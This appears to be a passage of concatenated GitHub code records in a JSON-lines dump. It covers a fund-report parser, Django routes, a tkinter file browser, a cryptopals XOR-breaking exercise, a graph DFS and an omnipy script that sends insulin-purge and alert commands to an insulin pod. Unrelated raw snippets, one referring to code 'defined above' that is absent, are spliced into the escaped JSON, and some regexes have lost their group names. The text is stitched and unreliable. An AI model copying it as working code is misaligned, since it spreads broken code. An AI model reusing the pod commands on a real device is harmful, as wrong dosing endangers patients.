re.findall(mid_detector, title)\n month = re.findall(month_detector, title)\n \n if len(year) > 0:\n single_report_info_df['year'] = num_cn2eng(year[0][:-1])\n if len(quarter) > 0:\n quarter = num_cn2eng(quarter[0][0])\n \n 
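# A quick numeric check of the colour metrics defined above: both the
# Euclidean and the "luminance" (red-mean) distances are normalised against
# the black-to-white diagonal, whose Euclidean length is sqrt(3 * 255**2).
# Self-contained recomputation for illustration only.
from math import sqrt

def euclidean(c1, c2):
    return sqrt(sum((a - b) ** 2 for a, b in zip(c1, c2)))

print(euclidean((0, 0, 0), (255, 255, 255)))   # ~441.67, the max_euclidean above
print(euclidean((10, 20, 30), (10, 20, 30)))   # 0.0 for identical colours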
single_report_info_df['report_type'] = 'Q'\n single_report_info_df['quarter'] = quarter\n \n if len(mid) > 0:\n single_report_info_df['report_type'] = 'H'\n single_report_info_df['quarter'] = '5'\n elif len(annual) > 0:\n single_report_info_df['report_type'] = 'A'\n single_report_info_df['quarter'] = '6'\n elif len(month) > 0:\n month = num_cn2eng(month[0][1:-1])\n \n single_report_info_df['report_type'] = 'M'\n single_report_info_df['quarter'] = num_cn2eng(month)\n \n if len(single_report_info_df) > 0:\n try:\n single_report_info_df.loc[0,'info'] = '-'.join([single_report_info_df['report_type'].values[0],\n single_report_info_df['year'].values[0],\n single_report_info_df['quarter'].values[0]])\n except: pass\n single_report_info_df.loc[0,'type'] = get_type(single_report_info_df['report_type'].values[0])\n report_info_df = pd.concat([report_info_df, single_report_info_df], axis = 0)\n \n \n report_info_df = report_info_df.reset_index(drop = True)\n \n if len(report_info_df) == 0: return report_info_df\n \n basic_info_df = pd.concat([self.code_info_dict[code]]*len(report_info_df), ignore_index = True,axis = 1).transpose()\n output = pd.concat([basic_info_df, report_info_df], axis = 1)\n output = output.sort_values(['report_year','month','day'])\n return output\n \n def process_code_list(self, code_list: list):\n aggregate_info = pd.DataFrame()\n for code in tqdm(code_list):\n code_info_df = self.process_single_code_info(code)\n if len(code_info_df) > 0:\n aggregate_info = pd.concat([aggregate_info, code_info_df])\n \n output = aggregate_info.reset_index(drop = True)\n return(output)\n \n def threading(self, jobs: int):\n code_list = self.code_list\n \n num_per_job = int(len(code_list) / jobs)\n code_list_cut = []\n for i in range(jobs):\n if i != jobs - 1:\n code_list_cut.append(code_list[i * num_per_job: (i + 1) * num_per_job])\n else:\n code_list_cut.append(code_list[i * num_per_job:])\n \n def multi_run(sub_code_list):\n sub_info_df = self.process_code_list(sub_code_list)\n return sub_info_df\n \n output = Parallel(n_jobs=jobs, verbose=1)(delayed(multi_run)(sub_list) for sub_list in code_list_cut)\n return output\n \n \nif __name__ == \"__main__\":\n code_info_dict_path = 'C:/Users/niccolo/Desktop/QLFtask/eastmoney/word_freq/raw_data/FundCode.csv'\n all_file_path = 'F:/eastmoney/SupFiles' \n save_path = 'C:/Users/niccolo/Desktop/QLFtask/eastmoney/word_freq/tables/comp_panel.xlsx'\n \n # code_info_dict_path = '/home/users/michaelfan/data/ConfCall/eastmoney/word_freq/FundCode.xlsx'\n # all_file_path = '/home/users/michaelfan/data/ConfCall/eastmoney/FullTexts'\n # save_path = '/home/users/michaelfan/data/ConfCall/eastmoney/word_freq/panel.xlsx'\n \n extractor = panel_info_extractor(code_info_dict_path, all_file_path)\n \n threading_results = extractor.threading(2)\n # test = extractor.process_code_list(extractor.code_list)\n # test = extractor.process_single_code_info('000001')\n \n final_df = pd.DataFrame()\n for df in threading_results:\n final_df = pd.concat([final_df, df])\n \n final_df.to_excel(save_path, index = False, encoding = 'gbk')\n\n \n \n ","repo_name":"GotoRyusuke/ChineseFundReports","sub_path":"word freq/extract_full_panel.py","file_name":"extract_full_panel.py","file_ext":"py","file_size_in_byte":7311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70515812269","text":"from django.urls import re_path\nfrom .views import (TracksList, CreateTrack, EditTrack, DeleteTrack, TopicsList,\nAddTopic, EditTopic, 
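# The extractor's threading() method above follows the standard joblib
# recipe: slice a list into roughly equal chunks, then fan the chunks out
# with Parallel/delayed and concatenate the results. The same pattern in
# miniature, with squares standing in for fund codes.
from joblib import Parallel, delayed

def process_chunk(chunk):
    return [x * x for x in chunk]

chunks = [[1, 2], [3, 4], [5, 6]]
results = Parallel(n_jobs=2)(delayed(process_chunk)(c) for c in chunks)
print(results)   # [[1, 4], [9, 16], [25, 36]]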
DeleteTopic, TopicDetails, TracksProgress, TopicsProgress,\nEditTopicNote)\n\nurlpatterns = [\n re_path(r\"create-track/$\", CreateTrack.as_view(), name='create-track'),\n re_path(r\"(?P[-\\w]+)/edit/$\", EditTrack.as_view(), name=\"edit-track\"),\n re_path(r\"(?P[-\\w]+)/delete/$\", DeleteTrack.as_view(), name=\"delete-track\"),\n re_path(r\"(?P[-\\w]+)/topics/$\", TopicsList.as_view(),\n name=\"topics\"),\n re_path(r\"(?P[-\\w]+)/add-topic/$\", AddTopic.as_view(),\n name=\"add-topic\"),\n re_path(r\"(?P[-\\w]+)/tracks-progress/$\", TracksProgress.as_view(),\n name=\"tracks-progress\"),\n\n #this to is topics\n re_path(r\"topics/(?P[-\\w]+)/edit-topic/$\", EditTopic.as_view(),\n name='edit-topic'),\n re_path(r\"topics/(?P[-\\w]+)/edit-note/$\", EditTopicNote.as_view(),\n name='edit-note'),\n re_path(r\"topics/(?P[-\\w]+)/delete-topic/$\", DeleteTopic.as_view(),\n name='delete-topic'),\n re_path(r\"topics/(?P[-\\w]+)/$\", TopicDetails.as_view(),\n name='topic-details'),\n #end topics\n \n re_path(r\"(?P[-\\w]+)/(?P[-\\w]+)/$\",\n TopicsProgress.as_view(), name='topics-progress'),\n re_path(r\"$\", TracksList.as_view(), name=\"tracks-list\")\n]","repo_name":"MAE776569/project-manager","sub_path":"src/tracks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24158242597","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.font import Font\nimport os\nimport re\n\nfrom pytkeditorlib.gui_utils import AutoHideScrollbar as Scrollbar\nfrom pytkeditorlib.utils.constants import CONFIG\nfrom .base_widget import BaseWidget\n\n\nclass Filebrowser(BaseWidget):\n def __init__(self, master, callback, **kw):\n BaseWidget.__init__(self, master, 'File browser', padding=2, **kw)\n self.rowconfigure(1, weight=1)\n self.columnconfigure(0, weight=1)\n\n self.history = []\n self.history_index = -1\n\n self.load_filters()\n # --- browsing buttons\n frame_btn = ttk.Frame(self)\n self.b_up = ttk.Button(frame_btn, image='img_up', padding=0,\n command=self.browse_up)\n self.b_backward = ttk.Button(frame_btn, image='img_left', padding=0,\n command=self.browse_backward)\n self.b_forward = ttk.Button(frame_btn, image='img_right', padding=0,\n command=self.browse_forward)\n self.b_backward.pack(side='left', padx=2)\n self.b_forward.pack(side='left', padx=2)\n self.b_up.pack(side='left', padx=2)\n self.b_forward.state(['disabled'])\n self.b_backward.state(['disabled'])\n\n ttk.Button(frame_btn, image='img_properties', padding=0,\n command=self.edit_filter).pack(side='right', padx=2)\n\n # --- filetree\n self.filetree = ttk.Treeview(self, show='tree', selectmode='none',\n style='flat.Treeview', padding=4)\n self._sx = Scrollbar(self, orient='horizontal', command=self.filetree.xview)\n self._sy = Scrollbar(self, orient='vertical', command=self.filetree.yview)\n\n self.filetree.configure(xscrollcommand=self._sx.set,\n yscrollcommand=self._sy.set)\n\n self.font = Font(self, font=\"TkDefaultFont 9\")\n self.callback = callback\n\n self.filetree.tag_configure('file', image='img_file')\n self.filetree.tag_configure('folder', image='img_folder')\n self.filetree.tag_bind('file', '', self._on_db_click_file)\n self.filetree.tag_bind('folder', '', self._on_db_click_folder)\n self.filetree.tag_bind('folder', '<>', self._on_folder_open)\n\n self.filetree.bind('<1>', self._on_click)\n\n # --- placement\n frame_btn.grid(row=0, columnspan=2, sticky='ew', pady=2)\n self.filetree.grid(row=1, 
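# Because each route above is registered with name=..., views and templates
# can resolve URLs with reverse() rather than hard-coding paths. The slugs
# below are illustrative values, and this assumes the urlconf is included at
# the project root.
from django.urls import reverse

# reverse("topics", kwargs={"track_slug": "python-basics"})
#     -> "/python-basics/topics/"
# reverse("edit-topic", kwargs={"topic_slug": "decorators"})
#     -> "/topics/decorators/edit-topic/"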
column=0, sticky='ewns')\n self._sx.grid(row=2, column=0, sticky='ew')\n self._sy.grid(row=1, column=1, sticky='ns')\n\n def _on_click(self, event):\n if 'indicator' not in self.filetree.identify_element(event.x, event.y):\n self.filetree.selection_remove(*self.filetree.selection())\n self.filetree.selection_set(self.filetree.identify_row(event.y))\n\n def _on_db_click_file(self, event):\n item = self.filetree.focus()\n if self.callback is not None and item:\n self.callback(item)\n\n def _on_db_click_folder(self, event):\n item = self.filetree.focus()\n if item:\n self.populate(item)\n\n def load_filters(self):\n filters = CONFIG.get('File browser', 'filename_filter',\n fallback='README, *.py, *.rst').split(', ')\n filters = ['^' + ext.strip().replace('.', '\\.').replace('*', '.*') + '$' for ext in filters]\n self.filter = re.compile('|'.join(filters))\n\n def edit_filter(self):\n\n def ok(event=None):\n CONFIG.set('File browser', 'filename_filter', entry.get())\n CONFIG.save()\n self.load_filters()\n self.populate(self.filetree.get_children()[0], history=False)\n top.destroy()\n\n top = tk.Toplevel(self, padx=4, pady=4)\n top.title('Filename filters')\n top.resizable(True, False)\n top.columnconfigure(0, weight=1)\n top.columnconfigure(1, weight=1)\n ttk.Label(top, text='Name filters:').grid(columnspan=2, sticky='w')\n entry = ttk.Entry(top)\n entry.grid(columnspan=2, sticky='ew', pady=4)\n entry.insert(0, CONFIG.get('File browser', 'filename_filter',\n fallback='README, *.py, *.rst'))\n entry.bind('', ok)\n entry.bind('', lambda e: top.destroy())\n entry.focus_set()\n ttk.Button(top, text='Ok', command=ok).grid(row=2, column=0, padx=4, sticky='e')\n ttk.Button(top, text='Cancel',\n command=top.destroy).grid(row=2, column=1, padx=4, sticky='w')\n top.transient(self)\n top.grab_set()\n\n def history_add(self, path):\n self.history_index += 1\n self.history = self.history[:self.history_index]\n self.history.append(path)\n if self.history_index > 0:\n self.b_backward.state(['!disabled'])\n self.b_forward.state(['disabled'])\n\n def browse_up(self):\n path = os.path.dirname(self.filetree.get_children()[0])\n self.populate(path)\n\n def browse_backward(self):\n self.history_index -= 1\n path = self.history[self.history_index]\n self.populate(path, history=False)\n self.b_forward.state(['!disabled'])\n if self.history_index == 0:\n self.b_backward.state(['disabled'])\n\n def browse_forward(self):\n self.history_index += 1\n path = self.history[self.history_index]\n self.populate(path, history=False)\n self.b_backward.state(['!disabled'])\n if self.history_index == len(self.history) - 1:\n self.b_forward.state(['disabled'])\n\n def clear(self, event=None):\n self.filetree.delete(*self.filetree.get_children())\n\n @staticmethod\n def _key_sort_files(item):\n return item.is_file(), item.name.lower()\n\n def _on_folder_open(self, event):\n \"\"\"Display folder content when opened by user.\"\"\"\n item = self.filetree.focus()\n self.filetree.delete(*self.filetree.get_children(item))\n self._lazy_populate(item)\n\n def _lazy_populate(self, path):\n \"\"\"\n Populate file tree of path only to the first level.\n\n Add dummy items inside folders so that they can be expanded but\n display their actual content only if the user opens them.\n \"\"\"\n try:\n content = sorted(os.scandir(path), key=self._key_sort_files)\n except PermissionError:\n return\n for item in content:\n is_dir = item.is_dir()\n ipath = item.path\n name = item.name\n if is_dir:\n if not name[0] == '.':\n self.filetree.insert(path, 
'end', ipath, text=name, tags='folder')\n self.filetree.insert(ipath, 'end', text='')\n elif self.filter.search(name):\n self.filetree.insert(path, 'end', ipath, text=name, tags='file')\n\n def populate(self, path, history=True, reset=False):\n self.configure(cursor='watch')\n self.update_idletasks()\n self._sx.timer = self._sx.threshold + 1\n self._sy.timer = self._sy.threshold + 1\n\n self.filetree.delete(*self.filetree.get_children())\n p = os.path.abspath(path)\n self.filetree.insert('', 0, p, text=p, image='img_folder', open=True)\n\n self._lazy_populate(p)\n\n self.configure(cursor='')\n if reset:\n self.history = []\n self.history_index = -1\n if history:\n self.history_add(path)\n","repo_name":"j4321/PyTkEditor","sub_path":"pytkeditorlib/widgets/filebrowser.py","file_name":"filebrowser.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42804776617","text":"\r\n\r\n\r\n# Importo los modulos que se comunican directamente con el controlador\r\nfrom tkinter import *\r\nfrom Vista import *\r\nfrom Modelo import *\r\nfrom TopLevelTemas import *\r\n\r\n\r\n# clase donde contengo los metodos a realizar con las distintas acciones de la app\r\nclass miControlador:\r\n\r\n\r\n\t#Llamada a la vista principal\r\n\tdef vistaPrincipalC(self, ):\r\n\t\ttry:\r\n\t\t\tregistros.imagenPrincipal(self,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\t\r\n\t# ventana emergente de temas\r\n\tdef topLevel(self, varOpcion, varOpcion_txt, ):\r\n\r\n\t\ttry:\r\n\t\t\ttopLevel.aparecerBg(self, varOpcion, varOpcion_txt)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\t# opciones de var que vienen de TopLevelTemas.py y que se dirigen a modelo.py para despues en temas.py decidir que tematica aplicar \r\n\tdef temaOpcion(self, varOpcion,):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.eleccionTema(self, varOpcion, self.tituloPrincipal, self.tituloReferencia, self.descripcionReferencia, \r\n\t\t\t\tself.altaBase, self.borrar, self.modificarRegistro, self.temasPrograma, self.accionesMensajes,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\tdef temaOpcion_txt(self, varOpcion_txt,):\r\n\t\ttry:\r\n\t\t\tmiModelo.fuentes_txt(self, varOpcion_txt, self.tituloPrincipal, self.tituloReferencia, self.descripcionReferencia, \r\n\t \tself.altaBase, self.borrar, self.modificarRegistro, self.temasPrograma, self.accionesMensajes,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\t#boton salir app\r\n\tdef salirAplicacion(self, root):\r\n\t\ttry:\r\n\t\t\tmiModelo.salir_app(self, root, )\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\t\t\t\r\n\tdef registroAltas(self, a_val, b_val, accionesMensajes, pantallaPrincipal ):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.agregarRegistro(self, a_val, b_val, accionesMensajes,)\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\t\t\r\n\tdef registroConsultas(self, pantallaPrincipal ):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\tdef registroBorrar(self, pantallaPrincipal, accionesMensajes, 
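# load_filters() above turns a comma-separated list of glob-style patterns
# into a single anchored regex ('.' escaped, '*' expanded to '.*'). The
# transformation in isolation, using the record's own default filter string.
import re

patterns = "README, *.py, *.rst".split(", ")
parts = ["^" + p.strip().replace(".", "\\.").replace("*", ".*") + "$" for p in patterns]
name_filter = re.compile("|".join(parts))

print(bool(name_filter.search("setup.py")))    # True
print(bool(name_filter.search("README")))      # True
print(bool(name_filter.search("notes.txt")))   # False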
):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.borrarRegistros(self, pantallaPrincipal, accionesMensajes,)\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\tdef registroActualizar(self, pantallaPrincipal, accionesMensajes, a_val, b_val,):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.actualizarRegistro(self, pantallaPrincipal, accionesMensajes, a_val, b_val,)\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\r\n#Inicio de la vista apenas inicie el programa\r\nif __name__ == '__main__':\r\n\tobjetoIniciar = miControlador()\r\n\tobjetoIniciar.vistaPrincipalC()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n","repo_name":"franco954/CRUD","sub_path":"Controlador.py","file_name":"Controlador.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19105750030","text":"from handler import Handler\nimport util\nimport random\nimport time\n\nclass Names(Handler):\n\n async def message_handler(self, message, jail, bonkbot):\n for data in self.cf.get(\"people\"):\n if \"|\" in data:\n parts = data.split(\"|\")\n person = parts[0]\n alias = random.choice(parts[1:])\n else:\n person = data\n alias = person\n if person in util.sanitize(message.content):\n await util.send_message(message.channel, random.choice(self.cf.get(\"names\")).replace(\"$\", alias))\n return True\n return False\n","repo_name":"calebclark/bonkbot","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72022071787","text":"from lex import lex, verbose_lex\nfrom AST import parse, verbose_parse\nimport AST as a\nimport interpreter as i\nimport compiler as c\n\nfrom time import time\nimport sys, os, threading, platform, argparse\n\n\ndef set_stack_recursion():\n \"\"\"\n Function that sets recusion limit to 0x1000000 and increases stacksize based on OS\n \"\"\"\n sys.setrecursionlimit(0x1000000)\n if platform.system() == \"Linux\":\n print(\"running on linux stack size: 2gb\\n\")\n threading.stack_size(2147483648) #set stack to 2gb\n else:\n print(\"running on windows stack size: 256mb\\n\")\n threading.stack_size(256000000)\n\n\ndef main():\n \"\"\"\n Main function called if script starts, procceses arguments and starts interpreter/compiler\n \"\"\"\n global parse\n global lex\n parser = argparse.ArgumentParser(description=\"Interpreter & Compiler for scolang-- programming language\")\n parser.add_argument(\"file_name\", type=str, metavar='File name', help=\"the file name that needs to be interpreted or compiled\")\n parser.add_argument('-c','--compile', dest='compile', action='store_true',default=False, help=\"Compile code into Assembly files\")\n parser.add_argument('-b','--build', dest='build', action='store_true',default=False, help=\"Used by PlatformIO build task. 
no need when manual compiling\")\n parser.add_argument('-i','--interpret',dest='interpret', action='store_true',default=False, help=\"Parse and Run code with interpreter\")\n parser.add_argument('-l','--lex', dest='verbose-lex', action='store_true',default=False, help=\"Run with verbose lexing\")\n parser.add_argument('-p','--parse', dest='verbose-parse', action='store_true',default=False, help=\"Run with verbose parsing\")\n parser.add_argument('-v','--verbose', dest='verbose-all', action='store_true',default=False, help=\"Run with verbose lexing and parsing\")\n parser.add_argument('-s','--stats', dest='statistic', action='store_true',default=False, help=\"Shows time statistics\")\n parser.add_argument('--clean', dest='clean', action='store_true',default=False, help=\"Deletes all *.S files from Platformio/src directory\")\n arguments = vars(parser.parse_args())\n\n set_stack_recursion()\n #check if file exists at ScolangSrc/\n\n if (not os.path.exists(f\"ScolangSrc/{arguments['file_name']}\")):\n raise Exception(\"no file named { %s } at specified path ScolangSrc/\" % f\"{arguments['file_name']}\")\n \n \n #use decorated functions based on verbose flags\n if (arguments['verbose-all'] == True or arguments['verbose-parse'] == True):\n parse = verbose_parse(parse) \n if (arguments['verbose-all'] == True or arguments['verbose-lex'] == True):\n lex = verbose_lex(lex) \n if (arguments['statistic'] == True):\n start_time = time()\n if (arguments['clean'] == True):\n os.popen('find ./PlatformioProject/src -iname \"*.S\" -delete')\n \n\n\n lex_out = lex(arguments['file_name'])\n ast = parse(lex_out)\n \n if (arguments['interpret'] == True):\n i.interpret(ast)\n \n \n if(arguments['statistic']==True):\n print(\"time to run program: %s seconds\" % round(time()-start_time,4))\n\n\n if (arguments['compile'] == True):\n c.mainCompiler(arguments['file_name'].strip(\".sco\"),ast) # removes .sco from filename to avoid hello.sco.S\n\n if (arguments['build'] == True):\n print(\"====================\\nAssembly Files Build\\nReady for tests\\n====================\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"KingPungy/ATP","sub_path":"PlatformioProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21503957655","text":"from bitstring import BitArray, BitString\nimport base64, math\n\nimport challenge3\n\n# Clipped from https://stackoverflow.com/a/49942785, credit to https://stackoverflow.com/users/1701600/boern\ndef get_bit(value, n):\n return ((value >> n & 1) != 0)\n# End clipped code\n\ndef count_bits(num):\n count = 0\n for i in range(0, 8):\n if get_bit(num, i):\n count+=1\n return count\n\ndef hamming_distance(bs1, bs2):\n sum = 0\n for i in range(0, len(bs1)):\n sum+=count_bits(bs1[i]^bs2[i])\n return sum\n\ndef solve_multi_xor(b64encoded_ciphertext):\n\n # get ciphertext in byte form\n b64_bytestring = b64encoded_ciphertext.encode(\"ascii\")\n b64bytes = base64.b64decode(b64_bytestring)\n hamming_distances = {}\n for keysize in range(2,40):\n #hamming_distances[hamming_distance(b64bytes[0:keysize], b64bytes[keysize:keysize+keysize])*1.0/keysize] = keysize\n hamming_distances[sum([hamming_distance(b64bytes[keysize*i:keysize*(i+1)],b64bytes[keysize*(i+1):keysize*(i+2)]) for i in range(0,60)])/(60.0*keysize)] = keysize\n \n likely_key_size = hamming_distances[min(hamming_distances.keys())]\n\n #chunk the ciphertext into `likely_key_size` blocks with 
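# set_stack_recursion() above raises the interpreter's recursion limit and
# the thread stack size. Note that threading.stack_size() only affects
# threads created afterwards, so the deep recursion has to run inside a
# fresh thread, as sketched here; depth and sizes are arbitrary.
import sys
import threading

def deep(n):
    return 0 if n == 0 else 1 + deep(n - 1)

sys.setrecursionlimit(0x1000000)
threading.stack_size(256000000)        # 256 MB, as in the record's Windows branch
t = threading.Thread(target=lambda: print(deep(100000)))
t.start()
t.join()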
parity\n chunks = []\n for i in range(0,likely_key_size):\n chunks.append([])\n for j in range(0+i, len(b64bytes), likely_key_size):\n chunks[i].append(b64bytes[j])\n key = \"\"\n for i in range(0, len(chunks)):\n key+=chr(int(challenge3.freq_analysis_get_key(\"\".join([hex(chunks[i][j])[2:4] if len(hex(chunks[i][j])) == 4 else \"0\"+hex(chunks[i][j])[2:3] for j in range(0, len(chunks[i]))]))[0],16))\n return key\n \n\nf = open(\"/Users/jacobhammontree/Projects/cryptopals/set1//challenge6.data\", \"r\")\nb64 = f.read().replace(\"\\n\",\"\")\nf.close()\nkey = solve_multi_xor(b64)\nprint(key)","repo_name":"jacobhammontree/cryptopals","sub_path":"challenges/challenge6.py","file_name":"challenge6.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1097918939","text":"adjList={\"A\":[\"B\",\"C\"], \"B\":[\"D\", \"E\"], \"C\":[\"B\", \"F\"], \"D\":[], \"E\":[\"F\"], \"F\":[] }\r\n\r\n\r\ncolor={}\r\nparent={}\r\ntravTime={}\r\nop=[]\r\n\r\nfor node in adjList.keys():\r\n color[node]=\"W\"\r\n parent[node]=None\r\n travTime[node]=[-1, -1]\r\n\r\ntime=0\r\n\r\ndef dfsUtil(u):\r\n global time\r\n color[u]=\"G\"\r\n travTime[u][0]=time\r\n op.append(u)\r\n time+=1\r\n\r\n for v in adjList[u]:\r\n if color[v]==\"W\":\r\n parent[v]=u\r\n dfsUtil(v)\r\n \r\n color[u]=\"B\"\r\n travTime[u][1]=time\r\n time+=1\r\n\r\nfor u in adjList.keys():\r\n if color[u]==\"W\":\r\n dfsUtil(u)\r\n\r\nprint(op)\r\nprint(color)\r\nprint(travTime)\r\n\r\n","repo_name":"NirajPatel07/Data-Structures-Python","sub_path":"Graph/Graph DFS Traversal.py","file_name":"Graph DFS Traversal.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11106359836","text":"# ^_^ coding: utf-8\n\n\ndef input_log_tofile(filename):\n while True:\n mes1 = input(\"请输入文件内容,exit或者quit退出: \")\n if mes1 in (\"exit\", \"quit\"):\n with open(filename, \"r\", encoding=\"utf-8\") as fp1:\n for buf in fp1.readlines():\n print(buf, end=\"\")\n break\n else:\n with open(filename, \"a\", encoding=\"utf-8\") as fp:\n fp.write(mes1 + \"\\n\")\n return True\n\nif __name__ == \"__main__\":\n input_log_tofile(\"input.log\")\n","repo_name":"rocky-wang/learnPy3","sub_path":"classroom/homework/base/file_ops.py","file_name":"file_ops.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8273967383","text":"import facebook\r\nimport fb\r\nimport json\r\nimport instapy_cli\r\nfrom datetime import datetime, timedelta, date\r\nfrom threading import Timer\r\n#import pynew2\r\n\r\ndef hello_world():\r\n graph=facebook.GraphAPI(access_token=\"\")\r\n msg=graph.put_object(parent_object='me',connection_name='feed',message='test message')\r\n print(msg)\r\n \r\ndef kl():\r\n print(\"hi\")\r\n\r\nif __name__==\"__main__\":\r\n x=datetime.today()\r\n y = x.replace(day=x.day, hour=3, minute=45, second=45, microsecond=0)\r\n # + timedelta(days=1)\r\n delta_t=y-x\r\n\r\n secs=delta_t.total_seconds()\r\n print(date.today())\r\n #hello_world()\r\n\r\n t = Timer(secs, kl)\r\n t.start()","repo_name":"parinavcodes/Automate-your-Social-Media","sub_path":"api_soc_poster.py","file_name":"api_soc_poster.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3505813417","text":"from 
podcomm.protocol_common import PdmMessage, PdmRequest, PodMessage, PodResponse\nfrom podcomm.protocol import *\nfrom podcomm.nonce import Nonce\nfrom podcomm.protocol_radio import PdmRadio, RadioPacket, RadioPacketType, TxPower\nfrom podcomm.crc import crc16, crc8\nfrom tests.mock_radio import MockPacketRadio\nfrom podcomm.pod import Pod\n\nimport time\n\npod = Pod()\npod.radio_address = 0x1f010101\nrd = PdmRadio(0x1f010101, 11, 11)\npod.id_t = 0x0007a75c\npod.id_lot = 0x0000ad89\n\nnonce = Nonce(pod.id_lot, pod.id_t, None, 0)\n#nonce.reset()\n# msg = request_assign_address(pod.radio_address)\n# rsp = rd.send_message_get_message(msg, ack_address_override=pod.radio_address, tx_power=TxPower.Lowest)\n# response_parse(rsp, pod)\n#\n# msg = request_setup_pod(pod.id_lot, pod.id_t, pod.radio_address, 2019, 5, 28, 21, 8)\n# rsp = rd.send_message_get_message(msg, ack_address_override=pod.radio_address)\n# response_parse(rsp, pod)\n\n# print(pod)\n# exit(0)\n\n#########################################\n\n# msg = request_set_low_reservoir_alert(Decimal(\"30\"))\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n\nmsg = request_set_generic_alert(15, 15)\nmsg.set_nonce(nonce.getNext())\nrsp = rd.send_message_get_message(msg)\nsync_word = response_parse(rsp, pod)\n\nnonce.sync(sync_word, msg.sequence)\n\n\nrd.message_sequence = msg.sequence\n\n\nmsg = request_set_generic_alert(15, 15)\nmsg.set_nonce(nonce.getNext())\nrsp = rd.send_message_get_message(msg)\nresponse_parse(rsp, pod)\n\n\nmsg = request_purge_insulin(Decimal(\"2.60\"))\nmsg.set_nonce(nonce.getNext())\nrsp = rd.send_message_get_message(msg)\nresponse_parse(rsp, pod)\n\n#\n# pm = request_set_pod_expiry_alert((24 * 60 * 2) + (20 * 60))\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n# schedule = [Decimal(\"1.0\")*48]\n# pm = request_set_basal_schedule(schedule, 0, 0, 0)\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n# pm = request_purge_insulin(Decimal(\"0.50\"))\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n# pm = request_status()\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n\ntime.sleep(15)\n\nmsg = request_status()\nrsp = rd.send_message_get_message(msg)\n\nprint(pod)\nexit(0)\n","repo_name":"winemug/omnipy","sub_path":"tests/dev2.py","file_name":"dev2.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"37"} +{"seq_id":"21538674864","text":"print(\"Ecuacion del tipo ax + b =0\")\na = 0\nb = 0\nresultado = 0\na = int(input(\"Ingrese a :\"))\nb = int(input(\"Ingrese b :\"))\n\nif a != 0:\n resultado = (-b/a)\n print(f\"El resultado de {a}x + {b} = 0 es que x = {resultado}\")\nelse :\n if a == 0:\n if b != 0:\n print(\"La ecuacion no tiene solucion\")\n else:\n print(\"La ecuacion tiene infinitas soluciones\")\n else:\n print(\"La ecuacion tiene infinitas soluciones\")\n","repo_name":"luisfelipe7799/Proyectos_Python_1","sub_path":"Ejercicios Estructuras repetitivas/Ecuación de Primer Grado.py","file_name":"Ecuación de Primer 